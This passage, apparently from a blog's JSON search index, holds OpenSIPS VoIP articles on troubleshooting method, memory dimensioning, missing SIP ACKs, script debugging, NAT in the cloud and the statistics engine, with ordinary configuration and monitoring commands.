注意:问题偶然出现也并不一定说明问题是偶然的,有可能因为没有找到唯一确定的触发条件,导致问题看起来是偶然的。 3. 特征维度 时间特征:集中于某一段时间产生 地理特征:集中于某一片区域产生 人群特征:集中于某几个人产生 设备特征:集中于某些电脑或者客户端 ","title":"问题排查方法论"},{"content":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nRunning OpenSIPS with the right memory configuration is a very important task when developing and maintaining your VoIP service, because it has a direct effect over the scale of your platform, the customers you support, as well as the services you offer. Setting the limit to a low value might make OpenSIPS run out of memory during high volume of traffic, or during complex scenarios, while setting a big value might lead to wasted resources.\n内存太小会导致OOM, 内存大大有会浪费\nUnfortunately picking this limit is not something that can be easily determined by a magic formula. The reason is that memory consumption is often influenced by a lot of external factors, like calling scenarios, traffic patterns, provisioned data, interactions with other external components (like AAA or DB servers), etc. Therefore, the only way to properly dimension the memory OpenSIPS is allowed to use is by monitoring memory usage, understanding the memory footprint and tuning this value accordingly. This article provides a few tips to achieve this goal.\n首先监控opensips的内存使用,然后根据监控的值调整合适的内存大小\nOpenSIPS内部的内存使用 opensips是个多进程程序并使用两种内存模型\n私有内存: 进程独占的内存,往往比较小 共享内存: opensips模块使用的内存,往往比较大 To understand the way OpenSIPS uses the available memory, we have to point out that OpenSIPS is a multi-process application that uses two types of memory: private and shared. Each process has its own private memory space and uses it to store local data, that does not need to be shared with other processes (i.e. parsing data). Most of the time the amount of private memory used is small, and usually fits into the default value of 2MB per process. Nevertheless understanding the way private memory is used is also necessary in order to properly dimension your platform’s memory.On the other hand, shared memory is a big memory pool that is shared among all processes. This is the memory used by OpenSIPS modules to store data used at run-time, and in most of the cases, the default value of 16MB is not enough. As I stated earlier, it is impossible to pick a “magic” value for this limit, mostly because there are a lot of considerations that affect it. The data stored in the shared memory can be classified in two categories:\n流量数据:1. 注册相关的数据;2. 呼叫相关的数据,tm和daillog 临时数据:数据库缓存数据\nTraffic data – data generated by your customers registration data, managed by the usrloc module, is directly linked to the number of customers registered into the platform; call data, managed by the tm and dialog modules, is related to the number of simultaneous calls done through the platform. Provisioning data – data cached from the database, used to implement the platform’s logic. The amount of memory used by each of this data may vary according to the services you offer, your customer base and their traffic.\n监控内存使用 有两种方式监控内存\nOpensips CP,这个工具比较方便,但是安装比较负载,一般不使用 通过opensips的fifo指令去获取内存。这个比较方便,可以做成crontab, 然后周期性的写入到influxdb。 There are two ways to monitor OpenSIPS memory statistics:\nfrom OpenSIPS CP Web GUI, using the statistics interface (Image 1) from cli using the opensipsctl tool: opensipsctl fifo get_statistics shmem: shmem:total_size:: 268435456 shmem:used_size:: 124220488 shmem:real_used_size:: 170203488 shmem:max_used_size:: 196065104 shmem:free_size:: 98231968 shmem:fragments:: 474863 From both you can observe 6 values:\ntotal_size: the total amount of memory provisioned used_size: the amount of memory required to store the data real_used_size: the total amount of memory required to store data and metadata max_used_size: the maximum amount of memory used since OpenSIPS started free_size: the amount of free memory fragments: the number of fragments When monitoring memory usage, the most important statistics are the max_used_size , because it indicates the minimum value OpenSIPS needs to support the traffic that has been so far and the real_used_size, because it indicates the memory used at a specific moment. We will use these metrics further on.\n理解内存使用 In order to have a better understanding about the memory used, we will take as an example a very specific platform: an outbound PSTN gateway, that is designed to support 500 CPS (calls per second) from customers and dispatch them to approximately 100K prefixes, cached by the drouting module. You can see the platform’s topology in this picture:\nTo figure out what happens in the scenario Image 1 presents, we will extract the real_used_size, max_used_size and actve_dialogs statistics:\nAs you can observe, at the beginning of the chart, the memory usage was low, close to 0. That is most likely OpenSIPS startup. Then, it grows quickly until around 60MB. That is OpenSIPS loading the 100K of prefixes into the drouting module cache. Next, as we can see in the **active_dialogs **statistic, traffic comes in in batches. Therefore OpenSIPS memory usage increases gradually, until around 170MB and stabilizes with the call-flow. After a while, the dialog numbers start to decrease, and the memory is again gradually released, until it ends to the idle memory of 60MB used by the drouting cache.Taking a closer look at the charts, you will notice two awkward things in the second half of the period:\ndialog占用的内存并不是呼叫结束后立即释放,而是由计时器去延时周期性的按批次去释放 SIP事务也不是会麻烦释放,而是会等待去耗尽网络中所有的重传消息\nopensips的很多模块往往需要一次性的把数据库中的数据加载到内存中。而在模块reload的时候,内存中会同时存在两份数据。直到新的数据完全加载完毕后,老的数据占用的内存才会释放,而在此之前,老的数据仍旧驻留在内存中,用来处理呼叫。所以在模块reload的时候,也是往往内存出现峰值的时候。 老的数据被释放之后,峰值会很快回落。\nEven though dialogs become significantly less, shared memory usage is still high. That is because dialogs are not immediately deleted from OpenSIPS memory, but on a timer job that deletes them in bulk batches from the database(increased DB performance). Also, SIP transactions are not deleted immediately after they complete, but stored for a while to absorb re-transmissions (according to RFC 3261 requirements). Even if there are no high amounts of dialogs coming in, there is a big spike of memory usage, which also changes the max_used_size statistic. The reason for this spike is a drouting module cache reload, over the MI (Management Interface): opensipsctl fifo dr_reload The reason for this spike is that during cache reload, OpenSIPS stores in memory two sets of data: the old one and the new one. The old set is used to route calls until the new set is fully loaded. After that, the memory for the old set is released, and the new set is used further on. Although this algorithm is used to increase the routing performance, it requires a large amount of memory during reload, usually doubling the memory used for provisioning.Following the article till now, you would say that looking at the memory statistics and correlating traffic with memory usage can be fairly easy to understand how OpenSIPS** **uses memory and what are the components that use more. Unfortunately that is not always true, because sometime you might not have the entire history of the events, or the events happen simultaneously, and you can not figure out why. Therefore you might end up in a situation where you are using large amount of memory, but can point out why. This makes scaling rather impossible (for both customers and provisioning rules), because you will not be able to estimate how components spread the memory among them. That is why in OpenSIPS 2.2 we added a more granular memory support, that allows you to view the memory used by each module (or group of modules). Memory usage in OpenSIPS 2.2 In order to enable granular memory support, you need to follow these steps:\ngenerate statistics files by running: # make generate-mem-stats 2\u0026gt; /dev/null compile OpenSIPS with extra shared memory support, by running: # make menuconfig -\u0026gt; Configure compile options -\u0026gt; \u0026lt;br /\u0026gt; Configure compile flags -\u0026gt; SHM_EXTRA_STATS\u0026lt;br /\u0026gt;# make all configure the groups in OpenSIPS configuration file: mem-group = \u0026#34;traffic\u0026#34;: \u0026#34;tm\u0026#34; \u0026#34;dialog\u0026#34; mem-group = \u0026#34;provision\u0026#34;: \u0026#34;drouting\u0026#34; restart OpenSIPS and follow the steps from the previous sections. Checking the statistics during peak time you will get something like this:\n# opensipsctl fifo get_statistics shmem_group_traffic: shmem_group_provision: shmem_group_traffic:fragments:: 153618 shmem_group_traffic:memory_used:: 85448608 shmem_group_traffic:real_used:: 86677612 shmem_group_provision:fragments:: 245614 shmem_group_provision:memory_used:: 53217232 shmem_group_provision:real_used:: 55182144 Checking the traffic statistics will show you exactly how much memory OpenSIPS uses for calls, while checking the provision statistics will show you the memory used by the drouting module. The rest of memory is used by other other modules or by the core. If you want to track those down too, group them in a new mem-group.**\nDimensioning OpenSIPS memory As you have noticed throughout this article, dimensioning OpenSIPS for a specific number of clients or provisioning data is not an easy task and requires a deep understanding of both customer traffic patterns and provisioning data, as well as OpenSIPS internals. We hope that using the tips provided in this article will help you have a better understanding of your platform, how memory resources are used by OpenSIPS, and how to dimension your VoIP platform to the desired scale.\n","permalink":"https://wdd.js.org/opensips/blog/memory-usage/","summary":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nRunning OpenSIPS with the right memory configuration is a very important task when developing and maintaining your VoIP service, because it has a direct effect over the scale of your platform, the customers you support, as well as the services you offer. Setting the limit to a low value might make OpenSIPS run out of memory during high volume of traffic, or during complex scenarios, while setting a big value might lead to wasted resources.","title":"理解并测量OpenSIPS的内存资源"},{"content":"We all experienced calls getting self disconnected after 5-10 seconds – usually disconnected by the callee side via a BYE request – but a BYE which was not triggered by the party behind the phone, but by the SIP stack/layer itself.This is one of the most common issues we get in SIP and one of the most annoying in the same time. But why it happens ?\nGetting to the missing ACK Such a decision to auto-terminate the call (beyond the end-user will and control) indicates an error in the SIP call setup. And because the call was somehow partially established (as both end-points were able to exchange media), we need to focus on the signalling that takes place after the 200 OK reply (when the call is accepted by the callee). So, what do we have between the 200 OK reply and the full call setup ? Well, it is the ACK requests – the caller acknowledgement for the received 200 OK.And according to the RFC3261, any SIP device not receiving the ACK to its final 2xx reply has to disconnect the call by issuing a standard BYE request.So, whenever you experience such 10 seconds disconnected calls, first thing to do is to do a SIP capture/trace and to check if the callee end-device is actually getting an ACK. It is very, very import to check for ACK at the level of the callee end-device, and not at the level of caller of intermediary SIP proxies – the ACK may get lost anywhere on the path from caller to callee.\nTracing the lost ACK In order to understand how and where the ACK gets lost, we need first to understand how the ACK is routed from caller to the callee’s end-device. Without getting into all the details, the ACK is routed back to callee based on the Record-Route and Contact headers received into the 200 OK reply. So, if the ACK is mis-routed, it is mainly because of wrong information in the 2oo OK.The Record-Route headers (in the 200 OK) are less to blame, as they are inserted by the visited proxies and not changed by anyone else. Assuming that you do not have some really special scenarios with SIP proxies behind NATs, we can simply discard the possibility of having faulty Record-Routes.So, the primary suspect is the Contact header in the 200 OK – this header is inserted by the callee’s end-device and it can be altered by any proxy in the middle – so there are any many opportunities to get corrupted. And this mainly happens due to wrong handling of NAT presence on end-user side – yes, that’s it, a NATed callee device.\nCommon scenarios No NAT handling If the proxy does not properly handle NATed callee device, it will propagate into the _200 OK_reply the private IP of the callee. And of course, this IP will be unusable when comes to routing back the ACK to the callee – the proxy will have the “impossible” mission to route to a private IP :). So, the ACK will get lost and call will get disconnected.\nIf the case, with OpenSIPS, you will have to review your logic in the onreply route and perform fix_nated_contact() for the 200 OK, if callee is known as NATed.\nThe correct handling and flow has to be like this:\nExcessive NAT handling While handling NATed end-points is good, you have to be careful not to over do it. If you see a private IP in the Contact header you should not automatically replace it with the source IP of the SIP packet. Or you should not do it for any incoming reply (like “let’s do it all the time, just to be sure”).\nIn a more complex scenarios where a call may visit multiple SIP proxies, the proxies may loose valuable routing information by doing excessive NAT traversal handling. Like in the scenario below, ProxyA is over doing it, by applying the NAT traversal logic also for calls coming from a proxy (ProxyB) and not only for replies coming from an end-point. By doing this, the IP coordinates of the callee will be lost from Contact header, as ProxyA has no direct visibility to callee (in terms of IP).\nIn such a case, with OpenSIPS, you will have to review your logic in the onreply route and to be sure you perform fix_nated_contact() for the 200 OK only if the reply comes from an end-point and not from another proxy.\nConclusions SIP is complicated and you have to pay attention to all the details, if you want to get it to work. Focusing only on routing the INVITE requests is not sufficient.If you come across disconnected calls:\nget a SIP capture/trace and see if the ACK gets to the callee end-point if not, check the Contact header in the 200 OK – it must point all the time to the callee end-point (a public IP) if not, check the NAT traversal logic you have in the onreply routes – be sure you do the Contact fixing only when it is needed. Shortly, be moderate, not too few and not too much …when comes to NAT handling ","permalink":"https://wdd.js.org/opensips/blog/miss-ack/","summary":"We all experienced calls getting self disconnected after 5-10 seconds – usually disconnected by the callee side via a BYE request – but a BYE which was not triggered by the party behind the phone, but by the SIP stack/layer itself.This is one of the most common issues we get in SIP and one of the most annoying in the same time. But why it happens ?\nGetting to the missing ACK Such a decision to auto-terminate the call (beyond the end-user will and control) indicates an error in the SIP call setup.","title":"Troubleshooting missing ACK in SIP"},{"content":"What makes OpenSIPS such an attractive and powerful SIP solutions is its high level of programmability, thanks to its C-like configuration script. But once you get into the “programming” area, you will automatically need tools and skills for troubleshooting.So here there are some some tips and tools you can use in OpenSIPS for “debugging” your configuration script.\nControlling the script logging The easiest way to troubleshoot your script is of course by using the xlog() core function and print your own messages. Still the internal OpenSIPS logs (generated by the OpenSIPS code) do provide a lot of information about what OpenSIPS is doing.The challenge with the logging is to control the amount and content of messages you want to log. Otherwise you will end up with huge piles of logs, completely impossible to read and follow.By using the $log_level script variable you can dynamically change the logging level (to make it more or less verbose) from the script level. You can do this only for parts of the script:\nlog_level= -1 # errors only ….. { …… $log_level = 4; # set the debug level of the current process to DEBUG uac_replace_from(….); $log_level = NULL; # reset the log level of the current process to its default level ……. }\nor only for certain messages, based on source IP (you can use the permissions module for a more dynamic approach, controlled via DB)\nif ($si==”11.22.33.44″) $log_level = 4;\nor some parts of the message (you can use the dialplan module for the dynamic approach):\nif ($rU==”911″) $log_level = 4;\nIMPORTANT: do not forget to reset the log level back to default before terminating the script, otherwise that log level will be used by the current process for all the future messages it will handle.\nTracing the script execution Still, using the xlog() core function may not be the best option as it implies a high script pollution and many script changes (with restarts, of course).So, a better alternative is the script_trace() core function. Once you enabled the script tracing, OpenSIPS will start logging its steps though the script execution, printing each function that is called and its line in the script file.This script tracing is really helpful when you want to understand or troubleshoot your script execution, answering questions like “why does my script not get to this route” or “why is the script function not called” or “I do not understand how the SIP message flows through my script“….. and many other similar problems.The script_trace() function can help even more by allowing you to trace the value of certain variables (or parts of the message) during the script execution. Like “I do not understand where in script my RURI is changed“. So you simply attach to the function a log line (with variables, of course) that will be evaluated and printed for each function in the script:\nscript_trace( 1, “$rm from $si, ruri=$ru”, “me”);\nwill produce:\n[line 578][me][module consume_credentials] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 581][me][core setsflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 583][me][assign equal] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 592][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 585][me][module is_avp_set] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 589][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 586][me][module is_method] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 587][me][module trace_dialog] -\u0026gt; (INVITE 127.0.0.1 , ruri=sip:tester@opensips.org) [line 590][me][core setflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org)\nAgain, you can enable the script tracing only for some cases (on demand). For example I want to trace only calls from a certain subscriber, so I can use the dialplan module and create in DB rules to match the subscribers I’m interested in tracing:\nif ( dp_translate(“1″,”$fU/$var(foo)”) )\ncaller must be traced according to dialplan 1 script_trace( 1, “$rm from $si, ruri=$ru”, “me”);\nBenchmarking the script Assuming that you get to a point where you managed to troubleshoot and fix your script in terms of the execution flow, you now may be interested in troubleshoot the script execution from the time perspective – how much time takes OpenSIPS to execute certain parts of the script.This is a mandatory step if you want to perform a performance analysis of your OpenSIPS setup.The benchmark module will help you to measure the time OpenSIPS took to execute different parts of the script:\nbm_start_timer(“lookup-timer”); lookup(“location”); bm_log_timer(“lookup-timer”);\nAn interesting capability of the module is to provide information about the current usage, but also aggregated information from the past, like how many times a certain timer was used or what was the total time spent in a timer (see the full provided information). And even more, such information can be pulled via Management Interface via the bm_poll_results command, for external usage:\nopensipsctl fifo bm_poll_results register-timer 3/40/12/14/13.333333 9/204/12/97/22.666667 lookup-timer 3/21/7/7/7.000000 9/98/7/41/10.888889\nIdentifying script bottlenecks But still you need to find the weak points of your script in terms on time to process. Or the bottlenecks of your script.OpenSIPS provides a very useful mechanism for this – the time thresholds. There are different thresholds, for different operations, that can be set in OpenSIPS core and modules. Whenever the execution takes longer than configured, OpenSIPS will report it to the log, together with additional useful information (such as operation details or script backtrace):\nexec_msg_threshold (core) – the maximum number of microseconds the processing of a SIP msg is expected to last. This is very useful to identify the “slow” functions in your overall script; exec_dns_threshold (core) – the maximum number of microseconds a DNS query is expected to last. This is very useful to identify what are the “slow” DNS queries in your routing (covering also SRV, NAPTR queries too);** tcp_threshold (core) – maximum number of microseconds sending a TCP request is expected to last. This is useful to identify the “slow” TCP connections (in terms of sending data). Note that this option will cover all TCP-based transports, like TCP plain, TLS, WS, WSS, BIN or HEP. exec_query_threshold (db_mysql module) – maximum number of microseconds for running a mysql query. This is useful to identify the “slow” query you may have. Note that this option covers all the mysql queries you may have in OpenSIPS – from script level or internally triggered by modules. A similar option is also in the db_postgres module too. An example for the output trigger by the exec_msg_threshold :\nopensips[17835]: WARNING:core:log_expiry: threshold exceeded : msg processing took too long – 223788 us.Source : BYE sip:………. opensips[17835]: WARNING:core:log_expiry: #1 is a module action : match_dialog – 220329us – line 1146 opensips[17835]: WARNING:core:log_expiry: #2 is a module action : t_relay – 3370us – line 1574 opensips[17835]: WARNING:core:log_expiry: #3 is a module action : unforce_rtp_proxy – 3297us – line 1625 opensips[17835]: WARNING:core:log_expiry: #4 is a core action : 78 – 24us – line 1188 opensips[17835]: WARNING:core:log_expiry: #5 is a module action : subst_uri – 8us – line 1201\nGood luck with the troubleshooting and be sure your OpenSIPS rocks !!\n","permalink":"https://wdd.js.org/opensips/blog/troubleshooting-opensips-script/","summary":"What makes OpenSIPS such an attractive and powerful SIP solutions is its high level of programmability, thanks to its C-like configuration script. But once you get into the “programming” area, you will automatically need tools and skills for troubleshooting.So here there are some some tips and tools you can use in OpenSIPS for “debugging” your configuration script.\nControlling the script logging The easiest way to troubleshoot your script is of course by using the xlog() core function and print your own messages.","title":"Troubleshooting OpenSIPS script"},{"content":"Cloud computing is a more and more viable option for running and providing SIP services. The question is how compatible are the SIP services with the Cloud environment ? So let’s have a look at this compatibility from the most sensitive (for SIP protocol) perspective – the IP network topology.A large number of existing clouds (like EC2, Google CP, Azure) have a particularity when comes to the topology of the IP network they provide – they do not provide public routable IPs directly on the virtual servers, rather they provide private IPs for the servers and a fronting public IP doing a 1-to-1 NAT to the private one.Such a network topology forces you to run the SIP service behind a NAT. Why is this such a bad thing? Because, unlike other protocols (such as HTTP), SIP is very intimate with the IP addresses – the IPs are part of the SIP messages and used for routing. So, a SIP server running on a private IP advertises its listening IP address (the private one) in the SIP traffic – this will completely break the SIP routing, both at transaction and dialog level :\ntransaction level – when sending a SIP request, the SIP server will construct the Via SIP header using its listening IP, so the private IP. But the information from the Via header is used by the receiver of the SIP request in order to route back the SIP replies. But routing to a private IP (from the public Internet) is mission impossible; dialog level – in a similar way, when sending an INVITE request, the SIP server will advertise in its Contact SIP header the private IP, so other SIP party will not be able to send any sequential request back to our server. So, how can OpenSIPS help you to run SIP services in the Cloud ?\nRunning OpenSIPS behind NAT OpenSIPS implements a smart mechanism of separating the IPs used at network level (as listeners) and the IPs inside the SIP messages.The “advertise” mechanism gives you full control of what IP is presented (or advertised) in the SIP messages, despite what IP is used for the networking communication. Shortly you can have OpenSIPS sending a SIP request from the 10.0.0.15 private IP address, but using for inside the message (as Via, Contact or Route) a totally different IP.When advertising a different IP (than the network layer), the following parts of the SIP message will be affected:\nthe introduced Via header (if a SIP request) the introduced Record-Route header (if a SIP request) the introduced Contact header OpenSIPS has a a very flexible way to control the advertised IP, at different levels: global, per listening interface or per SIP transaction\nGlobal Advertising Such advertising will affect the entire traffic handled by OpenSIPS, automatically, without any additional action in the actual routing script. This setting is achieved via the advertised_addressglobal parameter:advertised_address=\u0026ldquo;12.34.56.78\u0026rdquo;\nPer Interface Advertising For more complex scenarios when using multiple listening interfaces, you can opt for different advertised IP for each listener. Some listener may be bound to the NATed IP address, so you want to do advertising, some other listener may be bound to a private IP used only inside the private network, so you want no advertising.listen = udp:10.0.0.34:5060 as 99.88.44.33:5060listen = udp:10.0.0.36:5060All the SIP traffic routing through such an advertising interface will be automatically modified. The only thing you have to do is to be sure you properly control the usage of interfaces when you route your SIP traffic – usually switching to a different interface, by using the force_send_socket() script function.\nPer Transaction Advertising The finest granularity OpenSIPS offers for controlling the advertising IP is at SIP transaction level – that is, for each transaction (a SIP requests and all its replies) you can choose what should be the advertised IP.Such control is done at via the routing script – when routing the SIP requests, you can enforce a value to be advertise for its transactionset_advertised_address( 12.34.56.78 );As a small but important note : advertising a different IP identity may act as a boomerang – your OpenSIPS may be required to recognize itself based on IP you previously advertised. Like the IP advertised in an INVITE request in the Record-Route header must be recognized by OpenSIPS as “its own IP” later, when receiving a sequential request like ACK or BYE and inspecting the Route header.If for the global and per-interface advertising OpenSIPS is automatically able to recognize its own advertised IP’s, for the per-transaction level it cannot not. So you have to explicitly take care of that and teach OpenSIPS about the IP’s you plan to advertise by using the alias core parameter.\nRunning RTPproxy behind NAT So far we covered the OpenSIPS related part. But in many SIP scenarios you may be required to handle the media/RTP too, for cases like call recording, media pinning, DTMF sniffing or other.So, you may end up with the need of running RTPproxy behind an 1-to-1 NAT. Fortunately things are much more simple here. The nature of the 1-to-1 NAT takes care of the port mapping between the public NAT IP and the private IP. The only thing you have to do is to advertise the public IP in the SIP SDP, while keeping RTPproxy to operate on the private IP.To get this done, when using one of the RTPproxy related functions like rtpproxy_engage(), rtpproxy_answer() or rtpproxy_offer(), simply use the second parameter of these function to overwrite (in the SDP) the IP received from RTPproxy with the IP you want to advertise:rtpproxy_engage(\u0026ldquo;co\u0026rdquo;,\u0026ldquo;23.45.67.89\u0026rdquo;);This will result in having the 23.45.67.89 IP advertised in the SDP, rather than the IP RTPproxy is running on. And no other change is required in the actual RTPproxy configuration.\nWhat’s next ? What we covered so far here is a relatively simple scenario, still it is the mostly used one – an OpenSIPS behind NAT serving SIP client on the public Internet.But things are getting more complicated and interesting when you also want to offer media services (like voicemail) or you want to support SIP clients from both public and private networks – and these are the topics for some future posts on this matter.\n","permalink":"https://wdd.js.org/opensips/blog/runing-opensips-in-cloud/","summary":"Cloud computing is a more and more viable option for running and providing SIP services. The question is how compatible are the SIP services with the Cloud environment ? So let’s have a look at this compatibility from the most sensitive (for SIP protocol) perspective – the IP network topology.A large number of existing clouds (like EC2, Google CP, Azure) have a particularity when comes to the topology of the IP network they provide – they do not provide public routable IPs directly on the virtual servers, rather they provide private IPs for the servers and a fronting public IP doing a 1-to-1 NAT to the private one.","title":"Running OpenSIPS in the Cloud"},{"content":"无论你是经验丰富的OpenSIPS管理员,或者你仅仅想找到为什么ACK消息在你的网络中循环发送,唯一可以确定的是:我们或早或晚会需要OpenSIPS提供数据来回答以下问题\nOpenSIPS运行了多久? 我们是否被恶意流量攻击了? 我们的平台处理了多少个来自运营商的无效SIP包 在流量峰值时,OpenSIPS是否拥有足够的内存来支撑运行 \u0026hellip; 幸运的是,OpenSIPS提供内置的统计支持,来方便我们快速解决以上问题。详情可以查看OpenSIPS统计接口。在本篇文章中,我们将会了解统计引擎,但是,什么是引擎?\n统计引擎 总的来说,下图就是OpenSIPS引擎的样子。\n统计引擎内置于OpenSIPS。它管理所有的统计数据,并且暴露一个标准的CRUD操作接口给所有的模块,让模块可以推送或者管理他们自己的统计数据。\n一下有三种方式来和统计引擎进行交互\n直接通过脚本访问。如通过$script(my-stat)变量 使用HTTP请求来访问 使用opensipsctl fifo命令 统计引擎是非常灵活并且可以通过不同方式与其交互,那么它怎么能让我们的使用变得方便呢?下面的一些建议,能够让你全面的发挥静态统计引擎的能力,来增强某些重要的层面。\n系统开发维护 当你处理OpenSIPS的DevOps时,你经常需要监控OpenSIPS的一些运行参数。你的关注点不同,那么你就需要监控不同的方面,例如SIP事务、对话、内存使用、系统负载等等\n下面是OpenSIPS统计分组的一个概要,以及组内的每一个统计值,详情可以参考wiki。\n统计简介 假如我们想通过sipp对我们的平台进行流量测试,我们想压测期间观测当前的事务、对话、共享内存的值变化。或者我们我们有了一个新的SIP提供商,他们每天早上9点会开始向我们平台推送数据,我们需要监控他们的推送会对我们系统产生的影响。\n你可以在OpenSIPS实例中输入以下指令:\nwatch -n0.2 \u0026#39;opensipsctl fifo get_statistics inuse_transactions dialog: shmem:\u0026#39; 注意 get_statistics命令即可以接受一个统计值项,也可以接受一个统计组的项。统计组都是以冒号(:)结尾。\n与递增的统计指标进行交互 统计指标看起来相同,实际上分为两类\n累计值。累计是一般是随着时间增长,例如rcv_requests, processed_dialogs,表示从某个时间点开始累计收到或者处理了多少个任务 计算值。计算值一般和系统运行负载有关,和时间无关。例如active_dialogs, real_used_size, 这些值都是由内部函数计算出来的计算值 一般来说,脚本中定义的统计值都是递增的,OpenSIPS无法重新计算它,只能我们自己来计算或者维护它的值。\n以下方式可以快速查看计算值类的统计项\nopensipsctl fifo list_statistics 某些场景,你可能需要周期性的重置累计值类的统计项。例如你可以只需要统计当天的processed_dialogs,daily_routed_minutes,那么你只需要设置一个定时任务,每天0点,重置这些统计值。\nopensipsctl fifo reset_statistics processed_dialogs 在脚本中自定义统计项 在脚本中自定义统计项是非常简单的,只需要做两步\n加载statistics.so模块 在某些位置调用函数, update_stat(\u0026quot;daily_routed_minutes\u0026quot;, \u0026quot;+1\u0026quot;) 实战:脚本中有许多的自定义统计项 统计每天收到的SIP消息的请求方式, 以及处理的消息长度 每隔24小时,以JSON的形式,将消息写到SIP服务器 # 设置统计组 modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_groups\u0026#34;, \u0026#34;method, packet\u0026#34;) # 请求路由 route { ... update_stat(\u0026#34;method:$rm\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) # message length ... } # 响应路由 onreply_route { update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) } # 定时器路由,定时通过HTTP发请求 timer_route [daily_stat_push, 86400] { $json(all_stats) := \u0026#34;{\\\u0026#34;method\\\u0026#34;: {}, \\\u0026#34;packet\\\u0026#34;: {}}\u0026#34;; # pack and clear all method-related statistics stat_iter_init(\u0026#34;method\u0026#34;, \u0026#34;iter\u0026#34;); while (stat_iter_next(\u0026#34;$var(key)\u0026#34;, \u0026#34;$var(val)\u0026#34;, \u0026#34;iter\u0026#34;)) { $json(all_stats/method/$var(key)) = $var(val); reset_stat(\u0026#34;$var(key)\u0026#34;); } # pack and clear all packet-related statistics stat_iter_init(\u0026#34;packet\u0026#34;, \u0026#34;iter\u0026#34;); while (stat_iter_next(\u0026#34;$var(key)\u0026#34;, \u0026#34;$var(val)\u0026#34;, \u0026#34;iter\u0026#34;)) { $json(all_stats/packet/$var(key)) = $var(val); reset_stat(\u0026#34;$var(key)\u0026#34;); } # push the data to our web server if (!rest_post(\u0026#34;https://WEB_SERVER\u0026#34;, \u0026#34;$json(all_stats)\u0026#34;, , \u0026#34;$var(out_body)\u0026#34;, , \u0026#34;$var(status)\u0026#34;)) xlog(\u0026#34;ERROR: during HTTP POST, $json(all_stats)\\n\u0026#34;); if ($var(status) != 200) xlog(\u0026#34;ERROR: web server returned $var(status), $json(all_stats)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/blog/deepin-stat-engine/","summary":"无论你是经验丰富的OpenSIPS管理员,或者你仅仅想找到为什么ACK消息在你的网络中循环发送,唯一可以确定的是:我们或早或晚会需要OpenSIPS提供数据来回答以下问题\nOpenSIPS运行了多久? 我们是否被恶意流量攻击了? 我们的平台处理了多少个来自运营商的无效SIP包 在流量峰值时,OpenSIPS是否拥有足够的内存来支撑运行 \u0026hellip; 幸运的是,OpenSIPS提供内置的统计支持,来方便我们快速解决以上问题。详情可以查看OpenSIPS统计接口。在本篇文章中,我们将会了解统计引擎,但是,什么是引擎?\n统计引擎 总的来说,下图就是OpenSIPS引擎的样子。\n统计引擎内置于OpenSIPS。它管理所有的统计数据,并且暴露一个标准的CRUD操作接口给所有的模块,让模块可以推送或者管理他们自己的统计数据。\n一下有三种方式来和统计引擎进行交互\n直接通过脚本访问。如通过$script(my-stat)变量 使用HTTP请求来访问 使用opensipsctl fifo命令 统计引擎是非常灵活并且可以通过不同方式与其交互,那么它怎么能让我们的使用变得方便呢?下面的一些建议,能够让你全面的发挥静态统计引擎的能力,来增强某些重要的层面。\n系统开发维护 当你处理OpenSIPS的DevOps时,你经常需要监控OpenSIPS的一些运行参数。你的关注点不同,那么你就需要监控不同的方面,例如SIP事务、对话、内存使用、系统负载等等\n下面是OpenSIPS统计分组的一个概要,以及组内的每一个统计值,详情可以参考wiki。\n统计简介 假如我们想通过sipp对我们的平台进行流量测试,我们想压测期间观测当前的事务、对话、共享内存的值变化。或者我们我们有了一个新的SIP提供商,他们每天早上9点会开始向我们平台推送数据,我们需要监控他们的推送会对我们系统产生的影响。\n你可以在OpenSIPS实例中输入以下指令:\nwatch -n0.2 \u0026#39;opensipsctl fifo get_statistics inuse_transactions dialog: shmem:\u0026#39; 注意 get_statistics命令即可以接受一个统计值项,也可以接受一个统计组的项。统计组都是以冒号(:)结尾。\n与递增的统计指标进行交互 统计指标看起来相同,实际上分为两类\n累计值。累计是一般是随着时间增长,例如rcv_requests, processed_dialogs,表示从某个时间点开始累计收到或者处理了多少个任务 计算值。计算值一般和系统运行负载有关,和时间无关。例如active_dialogs, real_used_size, 这些值都是由内部函数计算出来的计算值 一般来说,脚本中定义的统计值都是递增的,OpenSIPS无法重新计算它,只能我们自己来计算或者维护它的值。\n以下方式可以快速查看计算值类的统计项\nopensipsctl fifo list_statistics 某些场景,你可能需要周期性的重置累计值类的统计项。例如你可以只需要统计当天的processed_dialogs,daily_routed_minutes,那么你只需要设置一个定时任务,每天0点,重置这些统计值。\nopensipsctl fifo reset_statistics processed_dialogs 在脚本中自定义统计项 在脚本中自定义统计项是非常简单的,只需要做两步\n加载statistics.so模块 在某些位置调用函数, update_stat(\u0026quot;daily_routed_minutes\u0026quot;, \u0026quot;+1\u0026quot;) 实战:脚本中有许多的自定义统计项 统计每天收到的SIP消息的请求方式, 以及处理的消息长度 每隔24小时,以JSON的形式,将消息写到SIP服务器 # 设置统计组 modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_groups\u0026#34;, \u0026#34;method, packet\u0026#34;) # 请求路由 route { ... update_stat(\u0026#34;method:$rm\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, 